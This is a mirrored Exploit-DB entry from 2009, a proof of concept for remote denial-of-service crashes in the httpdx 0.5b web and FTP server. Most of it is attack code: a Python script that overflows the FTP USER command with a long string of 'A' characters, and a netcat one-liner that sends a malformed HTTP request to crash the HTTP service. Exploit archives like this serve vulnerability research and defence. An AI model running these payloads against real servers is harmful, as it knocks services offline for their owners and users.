bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/8712.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

68 lines
No EOL
1.1 KiB
Text
Raw Permalink Blame History

*****************************
* OSCP TEAM Vuln Discovery *
*****************************
* sico2819 *
*****************************
http://offensive-security.com
**************************************
httpdx <= 0.5b multiple remote DOS POC
**************************************
sourceforge.net/projects/httpdx/
SYSTEM USED : WinXP SP3 FR
***************
POC POC POC POC
***************
httpdx <= 0.5b is vulnerable to multiple remote DOS, in both HTTP and FTP server.
*******************
***** FTP DOS *****
*******************
httpdx FTP crashed by multiple ways, due to BOF in many commands (USER, PASS, CWD, ...)
POC :
------ poc.py ----------
import socket
HOST = [ change host addr ]
PORT = 21
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
data= s.recv(1024)
s.send('USER '+'A'*1000)
s.close()
------- EOF -------------
*******************
**** HTTP DOS *****
*******************
httpdx crashed by sending a special HTTP request :
"GET / HTTP/1.1Host: "
POC :
echo "GET / HTTP/1.1Host: "|nc [HOST] 80
This is a OSCP Team POC, more to come !!
sico2819
# milw0rm.com [2009-05-18]
Reference in a new issue View git blame Copy permalink